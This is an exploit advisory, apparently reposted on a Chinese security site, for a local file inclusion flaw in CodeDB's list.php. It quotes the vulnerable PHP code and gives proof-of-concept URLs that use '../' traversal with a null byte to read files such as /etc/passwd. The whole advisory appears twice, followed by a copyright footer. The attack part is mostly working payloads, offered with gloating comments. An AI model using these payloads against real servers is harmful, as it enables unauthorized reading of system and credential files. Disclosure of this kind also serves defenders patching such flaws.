CodeDB (list.php lang) Local File Inclusion Vulnerability
###############################################################################
#
# Name : CodeDB (list.php lang) Local File Inclusion Vulnerability
# Author : cOndemned
# Greetz : ZaBeaTy, str0ke, irk4z, GregStar, doctor, Adish, Avantura ;*
#
###############################################################################
Source :
// list.php
2. $lang = htmlspecialchars($_GET['lang']); // ok, but.... for what ? lol
7. if(file_exists('templates/'.$lang.'_middle.php')) // We'll have to cut off rest of filename & extension
8. include('templates/'.$lang.'_middle.php'); // Ekhm... pwned ;d
Proof of Concept :
http://[host]/[codeDB_path]/list.php?lang=../readme.txt\0
http://[host]/[codeDB_path]/list.php?lang=../../../../etc/passwd\0
http://[host]/[codeDB_path]/list.php?lang=../[local_file]\0
EoF.
#
# Name : CodeDB (list.php lang) Local File Inclusion Vulnerability
# Author : cOndemned
# Greetz : ZaBeaTy, str0ke, irk4z, GregStar, doctor, Adish, Avantura ;*
#
###############################################################################
Source :
// list.php
2. $lang = htmlspecialchars($_GET['lang']); // ok, but.... for what ? lol
7. if(file_exists('templates/'.$lang.'_middle.php')) // We'll have to cut off rest of filename & extension
8. include('templates/'.$lang.'_middle.php'); // Ekhm... pwned ;d
Proof of Concept :
http://[host]/[codeDB_path]/list.php?lang=../readme.txt\0
http://[host]/[codeDB_path]/list.php?lang=../../../../etc/passwd\0
http://[host]/[codeDB_path]/list.php?lang=../[local_file]\0
EoF.
版权声明
本文仅代表作者观点,不代表本站立场。
本文系作者授权发表,未经许可,不得转载。
本文地址:/websafe/Exploit/149349.html
